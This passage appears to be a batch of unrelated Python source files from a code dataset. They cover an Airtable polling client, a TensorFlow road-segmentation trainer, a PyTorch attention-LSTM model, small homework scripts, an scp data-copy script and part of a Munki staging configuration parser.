del fields[\"id\"]\n del fields[\"created_at\"]\n\n return {\n \"id\": self.id,\n \"fields\": fields,\n }\n\n\n# TODO : should this class inheret from ABC?\nclass MetaBaseModel(BaseModel, abc.ABC):\n meta: Optional[pydantic.Json] = pydantic.Field(default=None, alias=\"_meta\")\n meta_last_seen_status: Optional[str] = pydantic.Field(\n default=None, alias=\"_meta_last_seen_status\"\n )\n status: Optional[str] = pydantic.Field(default=None, alias=\"Status\")\n\n @staticmethod\n @abc.abstractmethod\n def get_valid_statuses() -> Set[str]:\n ...\n\n @pydantic.validator(\"status\", allow_reuse=True)\n @pydantic.validator(\"meta_last_seen_status\", allow_reuse=True)\n def validate_status(cls, v):\n valid_statuses = cls.get_valid_statuses()\n\n if v not in valid_statuses:\n raise ValueError(\n \"Status '{}' not in valid statuses: {}\".format(\n v, \", \".join(valid_statuses)\n )\n )\n\n return v\n\n\n#########\n# TABLE #\n#########\n\n\nclass TableSpec(pydantic.BaseModel):\n name: str\n model_cls: Type[BaseModel]\n status_to_cb: Dict[Optional[str], Callable[[BaseModel], BaseModel]]\n\n def get_airtable_name(self):\n return config.Config.load().airtable.table_names[self.name]\n\n # TODO : add a `status_to_cb` validator that calls `get_valid_statuses`\n\n\n##########\n# CLIENT #\n##########\n\n\nclass AirtableClient:\n def __init__(self, read_only=False):\n self._read_only = read_only\n self._table_name_to_client = {}\n\n def _get_client(self, table_spec):\n if table_spec.name not in self._table_name_to_client.keys():\n self._table_name_to_client[table_spec.name] = _AirtableClient(\n config.Config.load().airtable.base_id,\n table_spec.get_airtable_name(),\n config.Config.load().airtable.api_key,\n )\n\n return self._table_name_to_client[table_spec.name]\n\n def get_all(self, table_spec, formula=None):\n return [\n table_spec.model_cls.from_airtable(raw)\n for raw in self._get_client(table_spec).get_all(formula=formula)\n ]\n\n def poll(self, table_spec):\n # TODO : sort by creation time asc\n\n # NOTE here is a formula for querying on a blank status\n # TODO : get rid of this if we don't need it\n # \"IF(\"\n # \"{{Status}} = BLANK(),\"\n # # If blank...\n # \"{{_meta_last_seen_status}} != \\\"{blank_sentinel}\\\",\"\n # # If not blank...\n # \"{{Status}} != {{_meta_last_seen_status}}\"\n # \")\"\n\n return [\n table_spec.model_cls.from_airtable(raw)\n for raw in self._get_client(table_spec).get_all(\n formula=(\n \"AND({Status} != BLANK(), \"\n \"{Status} != {_meta_last_seen_status})\"\n )\n )\n ]\n\n def iter(self, table_spec):\n for page in self._get_client(table_spec).get_iter():\n for raw in page:\n yield table_spec.model_cls.from_airtable(raw)\n\n def update(self, table_spec, model):\n if self._read_only:\n return\n\n self._get_client(table_spec).update(\n model.id,\n model.to_airtable()[\"fields\"],\n )\n\n\n#########\n# UTILS #\n#########\n\n# TODO : handle missing statuses (e.g. airtable field was updated)\ndef poll_table(\n client, table_spec, max_num_retries=DEFAULT_POLL_TABLE_MAX_NUM_RETRIES\n):\n logger.info(\"Polling table: {}\".format(table_spec.name))\n\n success = True\n\n for record in client.poll(table_spec):\n assert record.status is not None\n\n logger.info(\n \"Processing '{}' record: {}\".format(table_spec.name, record)\n )\n\n try:\n original_id = record.id\n original_status = record.status\n\n cb = table_spec.status_to_cb.get(record.status)\n\n if cb is None:\n logger.info(\n \"No callback for record with status '{}': {}\".format(\n record.status,\n record.id,\n )\n )\n continue\n\n for num_retries in range(max_num_retries):\n try:\n cb(record) # noqa: F841\n break\n except Exception:\n logger.exception(\n (\n \"Callback '{}' for record failed \"\n \"(num retries {}): {}\"\n ).format(\n num_retries,\n cb.__qualname__,\n record.id,\n )\n )\n else:\n logger.error(\n \"Callback '{}' for record did not succeed: {}\".format(\n cb.__qualname__, record.id\n )\n )\n success = False\n\n if original_id != record.id:\n raise ValueError(\n (\n \"Callback '{}' modified the ID of the record: \"\n \"original={}, new={}\"\n ).format(\n cb.__qualname__,\n original_id,\n record.id,\n )\n )\n finally:\n record.meta_last_seen_status = original_status\n\n # Update the record in airtable to reflect local modifications\n client.update(table_spec, record)\n\n return success\n","sub_path":"automation/utils/airtable.py","file_name":"airtable.py","file_ext":"py","file_size_in_byte":6842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"274709067","text":"import json\n\n\ninfile = open(\"US_fires_9_14.json\", \"r\")\noutfile = open(\"readable_9_14.json\", \"w\")\n\nfires_data = json.load(infile)\n\njson.dump(fires_data, outfile, indent=4)\n\n# Get data\nbrightness_list, lons, lats = [], [], []\n\nfor x in fires_data:\n bright_instance = x[\"brightness\"]\n lon = x[\"longitude\"]\n lat = x[\"latitude\"]\n\n brightness_list.append(bright_instance)\n lons.append(lon)\n lats.append(lat)\n\nfires_over_450 = [i for i in brightness_list if i > 450]\nprint(fires_over_450[:10])\nprint(lats[:10])\n\n# Graph:\nfrom plotly.graph_objs import Scattergeo, Layout\nfrom plotly import offline as offline\n\ndata = [\n {\n \"type\": \"scattergeo\",\n \"lon\": lons,\n \"lat\": lats,\n \"text\": brightness_list,\n \"marker\": {\n \"size\": [5 * bright_instance for bright_instance in brightness_list],\n \"color\": brightness_list,\n \"colorscale\": \"Viridis\",\n \"reversescale\": True,\n # \"colorbar\": {\"title\": \"Brightness\"},\n },\n }\n]\n\nmy_layout = Layout(title=\"Fires with Brightness over 450\")\n\nfig = {\"data\": data, \"layout\": my_layout}\n\noffline.plot(fig, filename=\"fire_brightness.html\")\n","sub_path":"JSON_HW.py","file_name":"JSON_HW.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"494161164","text":"#!/usr/bin/env python\n\n# encoding: utf-8\n\n'''\n@author: Jiadong Lin, Xi'an Jiaotong University, Leiden University\n\n@contact: jiadong324@gmail.com\n\n@time: 2020/3/2\n'''\n\nfrom matplotlib import pyplot as plt\nimport os\n\n\nclass PlotSingleImg():\n\n def __init__(self, segments_orignal, refLength, readLength, outDir, title):\n\n self.figure_size = 8\n self.ratio = 2\n self.title = title\n self.segments_orignal = segments_orignal\n\n self.readLength = int(readLength / self.ratio)\n self.refLength = int(refLength / self.ratio)\n\n self.outDir = outDir\n self.plot()\n\n def plot(self):\n\n figsize = self.figure_size, self.figure_size\n\n fig, ax1 = plt.subplots(1, 1, figsize=figsize)\n\n for seg in self.segments_orignal:\n\n if seg.forward():\n ax1.plot([seg.yStart(), seg.yEnd()], [seg.xStart(), seg.xEnd()], color='b', linewidth=2)\n else:\n ax1.plot([seg.yStart(), seg.yEnd()], [seg.xStart(), seg.xEnd()], color='r', linewidth=2)\n\n\n ax1.spines['right'].set_visible(False)\n ax1.spines['top'].set_visible(False)\n\n ax1.xaxis.set_ticks_position('top')\n ax1.yaxis.set_ticks_position('left')\n\n plt.xticks([])\n plt.yticks([])\n\n font = {\n 'weight': 'normal',\n 'size': 10,\n }\n\n ax1.set_ylabel('VARIATION', font)\n ax1.set_xlabel('REFERENCE', font)\n ax1.set_title(self.title, font)\n ax1.xaxis.set_ticks_position('top')\n ax1.invert_yaxis()\n\n # plt.show()\n plt.savefig(os.path.join(self.outDir))","sub_path":"plot/PlotSigleImg.py","file_name":"PlotSigleImg.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"136881867","text":"import sqlite3\n\ndb_conn = sqlite3.connect('demo_data.sqlite3')\ndb_cursor = db_conn.cursor()\n\ncreate_table = 'CREATE TABLE demo (s VARCHAR(1), x INTEGER, y INTEGER);'\ndb_cursor.execute(create_table)\n\ndata_entry_1 = 'INSERT INTO demo VALUES(\\'g\\', 3, 9);'\ndata_entry_2 = 'INSERT INTO demo VALUES(\\'v\\', 5, 7);'\ndata_entry_3 = 'INSERT INTO demo VALUES(\\'f\\', 8, 7);'\ndb_cursor.execute(data_entry_1)\ndb_cursor.execute(data_entry_2)\ndb_cursor.execute(data_entry_3)\n\ndb_conn.commit()\n\ncount_rows_query = 'SELECT count(*) FROM demo;'\ncount_rows = db_cursor.execute(count_rows_query).fetchone()[0]\n\"\"\"Number of rows\"\"\"\nprint(f'Total number of rows: {count_rows}')\n\ncount_at_least_5_query = ('SELECT count(*) FROM ' +\n '(SELECT x, y FROM demo ' +\n 'WHERE x >= 5 and y >= 5);'\n )\ncount_at_least_5 = db_cursor.execute(count_at_least_5_query).fetchone()[0]\n\"\"\"Rows where X and Y are at least 5\"\"\"\nprint(f'Total number of rows with x and y at least 5: {count_at_least_5}')\n\ncount_distinct_y_query = 'SELECT count(DISTINCT y) FROM demo;'\ncount_distinct_y = db_cursor.execute(count_distinct_y_query).fetchone()[0]\n\"\"\"Number of Unique Values in y\"\"\"\nprint(f'Unique values of y: {count_distinct_y}')\n\ndb_cursor.close()\ndb_conn.close()\n","sub_path":"DSPT1-Sprint-10/demo_data.py","file_name":"demo_data.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"412867469","text":"import os.path\nimport tensorflow as tf\nimport helper\nimport warnings\nfrom distutils.version import LooseVersion\nimport project_tests as tests\nimport datetime\n\n# Check TensorFlow Version\nassert LooseVersion(tf.__version__) >= LooseVersion('1.0'), 'Please use TensorFlow version 1.0 or newer. You are using {}'.format(tf.__version__)\nprint('TensorFlow Version: {}'.format(tf.__version__))\n\n# Check for a GPU\nif not tf.test.gpu_device_name():\n warnings.warn('No GPU found. Please use a GPU to train your neural network.')\nelse:\n print('Default GPU Device: {}'.format(tf.test.gpu_device_name()))\n\n\ndef load_vgg(sess, vgg_path):\n \"\"\"\n Load Pretrained VGG Model into TensorFlow.\n :param sess: TensorFlow Session\n :param vgg_path: Path to vgg folder, containing \"variables/\" and \"saved_model.pb\"\n :return: Tuple of Tensors from VGG model (image_input, keep_prob, layer3_out, \n layer4_out, layer7_out)\n \"\"\"\n # Use tf.saved_model.loader.load to load the model and weights\n vgg_tag = 'vgg16'\n vgg_input_tensor_name = 'image_input:0'\n vgg_keep_prob_tensor_name = 'keep_prob:0'\n vgg_layer3_out_tensor_name = 'layer3_out:0'\n vgg_layer4_out_tensor_name = 'layer4_out:0'\n vgg_layer7_out_tensor_name = 'layer7_out:0'\n tf.saved_model.loader.load(sess, [vgg_tag], vgg_path)\n print(\"load_vgg ====================================================\")\n graph = tf.get_default_graph()\n image_input = graph.get_tensor_by_name(vgg_input_tensor_name)\n keep_prob = graph.get_tensor_by_name(vgg_keep_prob_tensor_name)\n layer3_out = graph.get_tensor_by_name(vgg_layer3_out_tensor_name)\n layer4_out = graph.get_tensor_by_name(vgg_layer4_out_tensor_name)\n layer7_out = graph.get_tensor_by_name(vgg_layer7_out_tensor_name)\n\n \n return image_input, keep_prob, layer3_out, layer4_out, layer7_out\n# tests.test_load_vgg(load_vgg, tf)\n\n\ndef layers(vgg_layer3_out, vgg_layer4_out, vgg_layer7_out, num_classes):\n \"\"\"\n Create the layers for a fully convolutional network. Build skip-layers using the vgg layers.\n :param vgg_layer7_out: TF Tensor for VGG Layer 3 output\n :param vgg_layer4_out: TF Tensor for VGG Layer 4 output\n :param vgg_layer3_out: TF Tensor for VGG Layer 7 output\n :param num_classes: Number of classes to classify\n :return: The Tensor for the last layer of output\n \"\"\"\n print(\"layers ====================================================\")\n layer7_1x1 = tf.layers.conv2d(vgg_layer7_out, num_classes, 1, (1, 1), padding='same',\n kernel_initializer=tf.truncated_normal_initializer(stddev=0.01),\n kernel_regularizer=tf.contrib.layers.l2_regularizer(1e-3))\n layer4_1x1 = tf.layers.conv2d(vgg_layer4_out, num_classes, 1, (1, 1), padding='same',\n kernel_initializer=tf.truncated_normal_initializer(stddev=0.01),\n kernel_regularizer=tf.contrib.layers.l2_regularizer(1e-3))\n layer3_1x1 = tf.layers.conv2d(vgg_layer3_out, num_classes, 1, (1, 1), padding='same',\n kernel_initializer=tf.truncated_normal_initializer(stddev=0.01),\n kernel_regularizer=tf.contrib.layers.l2_regularizer(1e-3))\n\n layer7_out = tf.layers.conv2d_transpose(layer7_1x1, num_classes, 4, 2, padding='same',\n kernel_initializer=tf.truncated_normal_initializer(stddev=0.01),\n kernel_regularizer=tf.contrib.layers.l2_regularizer(1e-3))\n\n conv4sum = tf.add(layer7_out, layer4_1x1)\n conv_layer4_out = tf.layers.conv2d_transpose(conv4sum, num_classes, 4, 2, padding='same',\n kernel_initializer=tf.truncated_normal_initializer(stddev=0.01),\n kernel_regularizer=tf.contrib.layers.l2_regularizer(1e-3))\n\n conv3sum = tf.add(conv_layer4_out, layer3_1x1)\n final_layer = tf.layers.conv2d_transpose(conv3sum, num_classes, 16, 8, padding='same',\n kernel_initializer=tf.truncated_normal_initializer(stddev=0.01),\n kernel_regularizer=tf.contrib.layers.l2_regularizer(1e-3), name='final_layer')\n # print(final_layer.get_shape())\n # tf.Print(final_layer, [tf.shape(final_layer)])\n return final_layer\n# tests.test_layers(layers)\n\n\ndef optimize(nn_last_layer, correct_label, learning_rate, num_classes):\n \"\"\"\n Build the TensorFLow loss and optimizer operations.\n :param nn_last_layer: TF Tensor of the last layer in the neural network\n :param correct_label: TF Placeholder for the correct label image\n :param learning_rate: TF Placeholder for the learning rate\n :param num_classes: Number of classes to classify\n :return: Tuple of (logits, train_op, cross_entropy_loss)\n \"\"\"\n print(\"optimize ====================================================\")\n # nn_last_layer = tf.Print(nn_last_layer, [tf.shape(nn_last_layer)[3]])\n logits = tf.reshape(nn_last_layer, (-1, num_classes), name=\"logits\")\n\n # logits = tf.Print(logits, [tf.shape(logits), tf.shape(correct_label)])\n # reshaped_labels = tf.reshape(correct_label, (-1, num_classes))\n # logits = tf.Print(logits, [tf.shape(logits), tf.shape(reshaped_labels)])\n # iou, iou_op = tf.metrics.mean_iou(reshaped_labels, logits, 2)\n\n # Tensorflow IOU\n # y_true_f = tf.reshape(reshaped_labels, [-1])\n # y_pred_f = tf.reshape(logits, [-1])\n # inter = tf.reduce_sum(tf.multiply(y_pred_f, y_true_f))\n # union = tf.reduce_sum(tf.subtract(tf.add(y_pred_f, y_true_f), tf.multiply(y_pred_f, y_true_f)))\n # loss = tf.subtract(tf.constant(1.0, dtype=tf.float32), tf.div(inter, union))\n # intersection = tf.reduce_sum(y_true_f * y_pred_f)\n # loss = tf.constant(1.0)-(tf.constant(2.) * intersection) / (tf.reduce_sum(y_true_f) + tf.reduce_sum(y_pred_f))\n\n cross_entropy_loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(\n labels=correct_label, logits=logits))\n optimizer = tf.train.AdamOptimizer(learning_rate).minimize(cross_entropy_loss)\n\n return logits, optimizer, cross_entropy_loss\n# tests.test_optimize(optimize)\n\ndef lr_generator(lr):\n original_rate = lr\n rate = lr\n max_deviation = 0.3\n change_rate = 0.1 * original_rate\n direction = 1\n while True:\n if rate == round(original_rate * (1 - max_deviation), 10):\n direction = 1\n elif rate == round(original_rate * (1+max_deviation), 10):\n direction = -1\n rate = rate + direction * change_rate\n rate = round(rate, 10)\n yield rate\n\n\ndef train_nn(sess, epochs, batch_size, get_batches_fn, train_op, cross_entropy_loss, input_image,\n correct_label, keep_prob, learning_rate):\n \"\"\"\n Train neural network and print out the loss during training.\n :param sess: TF Session\n :param epochs: Number of epochs\n :param batch_size: Batch size\n :param get_batches_fn: Function to get batches of training data. Call using get_batches_fn(batch_size)\n :param train_op: TF Operation to train the neural network\n :param cross_entropy_loss: TF Tensor for the amount of loss\n :param input_image: TF Placeholder for input images\n :param correct_label: TF Placeholder for label images\n :param keep_prob: TF Placeholder for dropout keep probability\n :param learning_rate: TF Placeholder for learning rate\n \"\"\"\n # TODO: Implement function\n keep_probability = 1.0\n lr_gen = lr_generator(0.001)\n\n # generator = get_batches_fn(batch_size)\n # image, label = next(generator)\n\n\n sess.run(tf.global_variables_initializer())\n sess.run(tf.local_variables_initializer())\n for e in range(epochs):\n i = 0\n lr = next(lr_gen)\n print('=====running epoch: {} with lr: {}'.format(e, lr))\n for image, label in get_batches_fn(batch_size):\n # generator = get_batches_fn(batch_size)\n # image, label = next(generator)\n feed_dict = {input_image: image,\n correct_label: label,\n keep_prob: keep_probability,\n learning_rate: lr\n }\n logits = tf.get_default_graph().get_tensor_by_name('logits:0')\n\n _, loss, out = sess.run([train_op, cross_entropy_loss, logits], feed_dict=feed_dict)\n\n i += 1\n if i % 5 == 0:\n print('loss:{}'.format(loss))\n\n\n\n # sess.run([train_op], {correct_label: np.arange(np.prod(shape)).reshape(shape), learning_rate: 10})\n # test, loss = sess.run([layers_output, cross_entropy_loss], {correct_label: np.arange(np.prod(shape)).reshape(shape)})\n\n# tests.test_train_nn(train_nn)\n\n\ndef run():\n epochs = 50\n batch_size = 10\n num_classes = 2\n image_shape = (160, 576)\n data_dir = './data'\n runs_dir = './runs'\n tests.test_for_kitti_dataset(data_dir)\n\n # Download pretrained vgg model\n helper.maybe_download_pretrained_vgg(data_dir)\n\n # OPTIONAL: Train and Inference on the cityscapes dataset instead of the Kitti dataset.\n # You'll need a GPU with at least 10 teraFLOPS to train on.\n # https://www.cityscapes-dataset.com/\n\n with tf.Session() as sess:\n # Path to vgg model\n vgg_path = os.path.join(data_dir, 'vgg')\n # Create function to get batches\n get_batches_fn = helper.gen_batch_function(os.path.join(data_dir, 'data_road/training'), image_shape)\n\n correct_label = tf.placeholder(tf.float32, [None, None, None, num_classes], name=\"correct_label\")\n # learning_rate = tf.placeholder(tf.float32)\n # keep_prob = tf.placeholder(tf.float32, name='keep_prob')\n learning_rate = tf.placeholder(tf.float32, name='learning_rate')\n # OPTIONAL: Augment Images for better results\n # https://datascience.stackexchange.com/questions/5224/how-to-prepare-augment-images-for-neural-network\n\n # TODO: Build NN using load_vgg, layers, and optimize function\n input_image, keep_prob, vgg_layer3_out, vgg_layer4_out, vgg_layer7_out = load_vgg(sess, vgg_path)\n layers_output = layers(vgg_layer3_out, vgg_layer4_out, vgg_layer7_out, num_classes)\n logits, optimizer, cross_entropy_loss = optimize(layers_output, correct_label, learning_rate, num_classes)\n # TODO: Train NN using the train_nn function\n train_nn(sess, epochs, batch_size, get_batches_fn,\n optimizer, cross_entropy_loss, input_image,\n correct_label, keep_prob, learning_rate)\n # TODO: Save inference data using helper.save_inference_samples\n helper.save_inference_samples(runs_dir, data_dir, sess, image_shape, logits, keep_prob, input_image)\n\n # OPTIONAL: Apply the trained model to a video\n\n\nif __name__ == '__main__':\n a = datetime.datetime.now()\n run()\n b = datetime.datetime.now()\n print('Time taken: {}'.format(b - a))\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"591958914","text":"from models import BaseModel\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as f\nfrom models.cnn import CNN\nfrom models.attention import NoQueryAttention\n\nclass ATAE_LSTM(BaseModel):\n def __init__(self, filed = 80):\n super(ATAE_LSTM, self).__init__()\n self.filed = filed\n self.cnn_l = CNN(filed=self.filed)\n self.rnn_l = nn.LSTM(\n input_size=80,\n hidden_size=64,\n num_layers=4,\n batch_first=True)\n\n self.attention = NoQueryAttention(128, score_function='bi_linear')\n\n self.linear = nn.Sequential(\n nn.Linear(64, 64),\n nn.Linear(64, 2),\n )\n\n\n def forward(self, x_l):\n\n x_l = x_l.view(-1, x_l.size(-2), x_l.size(-1))\n c_out_l = self.cnn_l(x_l)\n batch, cheight, cwidth =c_out_l.size()\n r_in_l = c_out_l.clone()\n for i in range(cheight):\n r_in_l[:,i,:] = c_out_l[:,-1,:]\n # print(r_in_l.shape)\n r_in_l = torch.cat((c_out_l,r_in_l), dim=2)\n h_n_l, (_, _) = self.rnn_l(r_in_l)\n batch, cheight, cwidth = h_n_l.size()\n h_n = h_n_l.clone()\n for i in range(cheight):\n h_n[:,i,:] = h_n_l[:,-1,:]\n h_n = torch.cat((h_n_l, h_n), dim=2)\n # print(h_n.shape)\n _, score = self.attention(h_n)\n # print(score.shape)\n output = torch.squeeze(torch.bmm(score, h_n_l), dim=1)\n # print(output.shape)\n out = self.linear(output)\n return f.log_softmax(out, dim=1)\n\n","sub_path":"code/OC-IAN/models/atae_lstm.py","file_name":"atae_lstm.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"636730362","text":"\"\"\"\n865. Smallest Subtree with all the Deepest Nodes\n\n\nGiven the root of a binary tree, the depth of each node is the shortest distance to the root.\n\nReturn the smallest subtree such that it contains all the deepest nodes in the original tree.\n\nA node is called the deepest if it has the largest depth possible among any node in the entire tree.\n\nThe subtree of a node is tree consisting of that node, plus the set of all descendants of that node.\n\nNote: This question is the same as 1123: https://leetcode.com/problems/lowest-common-ancestor-of-deepest-leaves/\n\n\n\nExample 1:\n\n\nInput: root = [3,5,1,6,2,0,8,null,null,7,4]\nOutput: [2,7,4]\nExplanation: We return the node with value 2, colored in yellow in the diagram.\nThe nodes coloured in blue are the deepest nodes of the tree.\nNotice that nodes 5, 3 and 2 contain the deepest nodes in the tree but node 2 is the smallest subtree among them, so we return it.\nExample 2:\n\nInput: root = [1]\nOutput: [1]\nExplanation: The root is the deepest node in the tree.\nExample 3:\n\nInput: root = [0,1,3,null,2]\nOutput: [2]\nExplanation: The deepest node in the tree is 2, the valid subtrees are the subtrees of nodes 2, 1 and 0 but the subtree of node 2 is the smallest.\n\n\nConstraints:\n\nThe number of nodes in the tree will be in the range [1, 500].\n0 <= Node.val <= 500\nThe values of the nodes in the tree are unique.\n\n\n\n\"\"\"\n\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass SubtreeWithAllDeepest:\n\n def doit_search(self, root):\n\n depth = 0\n res = None\n\n def search(node, length):\n\n nonlocal depth\n nonlocal res\n\n if not node:\n return length\n\n l = search(node.left, length + 1)\n r = search(node.right, length + 1)\n\n ans = max(l, r)\n if depth < ans:\n depth = ans\n res = node\n\n if l == r == depth:\n res = node\n\n return ans\n\n search(root, 0)\n return res\n","sub_path":"PythonLeetcode/leetcodeM/865_SmallestSubtreewithalltheDeepestNodes.py","file_name":"865_SmallestSubtreewithalltheDeepestNodes.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"120776810","text":"#3\n########################################\n# Programmer:Benji Saltz\n# Date: oct.19/16\n# File Name: encoder.py\n# Description: Makes letters of a word translate to ascii and shows what symbols represent the word\n########################################\ndef messageencoder():\n \"\"\"\n (str)->(str)\n turns the letters of the word to symbols according to the ascii outcome\n\n enter a sentence: I am coding\n >>>h\u0017kd(`lh`mm\n \"\"\"\n #main\n import random\n text=''\n\n for i in range(0,len(sentence)):\n addtract = random.randint(1,10)\n code=ord(sentence[i])\n\n if(addtract%2==0):\n code2=code+addtract\n else:\n code2=code-addtract\n text+=chr(code2)\n return text\nsentence = str(input(\"enter the sentence: \"))\nprint(messageencoder())\n","sub_path":"Gr.11 Computer Science/Gr.11-Computer-Science-Advanced-Functions-Message-Encoder-Final.py","file_name":"Gr.11-Computer-Science-Advanced-Functions-Message-Encoder-Final.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"433152231","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Dec 22 20:02:44 2017\n\n@author: xiaoqian\n\"\"\"\n#from NIMS to BSL\nfrom utility import *\n#scp -r xiaoqian@cnic22.stanford.edu:/home/xiaoqian/Documents/nimsfs/raw/nolanw/hypno/$filename\n#/Users/xiaoqian/Projects/hypno/raw\nimport os\n\nremotehost = 'xiaoqian@cnic22.stanford.edu'\nremotedir = '/home/xiaoqian/Documents/nimsfs/raw/nolanw/hypno'\nlocaldir = '/Users/xiaoqian/Projects/hypno/raw'\n\nfor i in dict_subID:\n print (dict_subID[i])\n filename = i\n os.system('scp -r \"%s:%s/%s\" \"%s\"' % (remotehost, remotedir, filename, localdir))\n #filename1 = os.path.join(remotedir, i, '*'+'_mux3_scan')\n #filename2 = os.path.join(remotedir, i, '*'+'_sag')\n #os.system('scp -r \"%s:%s\" \"%s/%s/\"' % (remotehost, filename1, localdir, i))\n #os.system('scp -r \"%s:%s\" \"%s/%s/\"' % (remotehost, filename2, localdir, i))\n \n","sub_path":"Preprocess.py","file_name":"Preprocess.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"338964144","text":"from __future__ import print_function\n#\n# This software is Copyright (c) 2015 University of Oxford\n# \n# This work is made avaiable to you under the terms of the Apache\n# License, Version 2.0; you may not use this source code except in\n# compliance with the License. You may obtain a copy of the License at\n# \n# http://www.apache.org/licenses/LICENSE-2.0\n# \n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied. See the License for the specific language governing\n# permissions and limitations under the License.\n#\n\nfrom future import standard_library\nstandard_library.install_aliases()\nfrom builtins import object\nimport re\n\nfrom configparser import RawConfigParser, _default_dict\n\nfrom . import default_settings\n\nimport argparse\n\nfrom datetime import datetime\n\nhave_dateutil=0\ntry:\n from dateutil import parser\n have_dateutil=1\nexcept ImportError:\n pass\n\ndef _list_cmp(a,b):\n if a[0] < b[0]:\n return -1\n\n if a[0] > b[0]:\n return 1\n\n if a[0] == b[0]: # We could be more precise here,\n # and sort on [1], but it is not necessary\n return 0 \n\nclass MunkiSchedule(object):\n\n # We assume that schedule_list is the result of\n # RawConfigParser.items(section) i.e. a list of key,value tuples\n\n def __init__(self, schedule_list):\n \n self.periods = {}\n\n for day,periods in schedule_list:\n\n # NOTE: Monday == 0, Sunday == 6\n # (according to parser)\n dow=parser.parse('%s' % day).weekday()\n allowed = []\n for period in periods.split(','):\n start,end = period.split('-')\n\n s=parser.parse('%s' % start)\n e=parser.parse('%s' % end)\n\n period_start = s.hour * 3600 + s.minute * 60\n period_end = e.hour * 3600 + e.minute * 60\n if period_end < period_start:\n raise ValueError('End of period must be later than start of period - are you using the 24 hour clock ? (start: %s, end %s)' % (period_start, period_end) )\n if period_end == period_start:\n raise ValueError('End of period must be different to start of period (start: %s, end %s)' % (period_start , period_end) )\n \n allowed.append( [ period_start, period_end ] )\n\n self.periods[ dow ] = allowed\n\n def stage_now(self, now=None, debug=False):\n if now is None:\n now = datetime.now()\n dow = now.weekday()\n\n if dow in self.periods:\n now_int = now.hour * 3600 + now.minute * 60 + now.second\n for period in self.periods[dow]:\n if debug:\n print('%s %s %s %s' % (period[0], now_int, period[1], now))\n if period[0] <= now_int and now_int <= period[1]:\n return True\n if now_int < period[0]: # stop working when we can\n break \n\n return False\n \nclass MunkiStagingConfig(RawConfigParser):\n\n # Note: set allow_no_value=True here as the default\n # (which is what we want, but not he RawConfigParser default)\n def __init__(self, defaults=None, dict_type=_default_dict,\n allow_no_value=True):\n\n RawConfigParser.__init__(self,defaults, dict_type, allow_no_value)\n self.read_config_files = -1\n self.repositories = {}\n\n def configured_munki_repositories(self):\n\n # If we have read a config file, then use it and \n # don't allow any other overrides in for the catalogs\n if self.read_config_files >= 1:\n return MunkiStagingRepositories(self)\n\n # Otherwise, we only have a single catalog:\n repo_path = self._get_option('main', 'repo_path',\n default_value=default_settings.repo_path)\n\n return [ { 'repo_name': 'production', 'repo_path': repo_path } ]\n\n def add_munki_repo(self, repo):\n self.repositories[repo.name] = repo\n\n def munki_catalogs(self):\n # If we have read a config file, and it has sections\n # defined, use it in preferece to the defaults\n \n configcatalogs = MunkiStagingConfigCatalogs(self)\n if self.read_config_files >= 1 and len(configcatalogs) > 0 :\n return MunkiStagingConfigCatalogs(self)\n \n print(\"No configuration file ... using defaults\")\n # Find the first repo: if we have got this far, we assume that\n # there is only 1 repository ...\n munki_repositories = self.configured_munki_repositories()\n # munki_repositories can be an iterator or a list\n try:\n munki_repo = next(munki_repositories)\n except AttributeError:\n munki_repo = munki_repositories[0]\n \n \n # If we haven't then use the CLI options (or the defaults)\n dev_config = {}\n test_config = {}\n prod_config = {}\n\n dev_config['section_name'] = 'development'\n dev_config['list'] = self.cli_args.dev_list\n dev_config['to_list'] = self.cli_args.to_dev_list\n dev_config['catalog'] = self.cli_args.dev_catalog\n dev_config['munki_repo'] = munki_repo['repo_name']\n if self.cli_args.dev_stage_days is not None:\n dev_config['stage_days'] = self.cli_args.dev_stage_days\n\n test_config['section_name'] = 'testing'\n test_config['list'] = self.cli_args.test_list\n test_config['to_list'] = self.cli_args.to_test_list\n test_config['catalog'] = self.cli_args.test_catalog\n test_config['munki_repo'] = munki_repo['repo_name']\n if self.cli_args.test_stage_days is not None:\n test_config['stage_days'] = self.cli_args.test_stage_days\n test_config['autostage'] = self.cli_args.stage_test\n\n prod_config['section_name'] = 'production'\n prod_config['list'] = self.cli_args.prod_list\n prod_config['to_list'] = self.cli_args.to_prod_list\n prod_config['catalog'] = self.cli_args.prod_catalog\n prod_config['autostage'] = self.cli_args.stage_prod\n prod_config['munki_repo'] = munki_repo['repo_name']\n\n if self.cli_args.suffix:\n prod_config['list'] = self.cli_args.suffix\n prod_config['dated_lists'] = 1\n\n return [ dev_config, test_config, prod_config ]\n\n def get_makecatalogs(self):\n makecatalogs = self._get_option('main', 'makecatalogs',\n default_value=default_settings.makecatalogs)\n\n return makecatalogs\n\n def cli_parse(self):\n\n self.opts = argparse.ArgumentParser(description='Stage packages in Munki based on a trello board')\n\n # showconfig is a true/false thing:\n 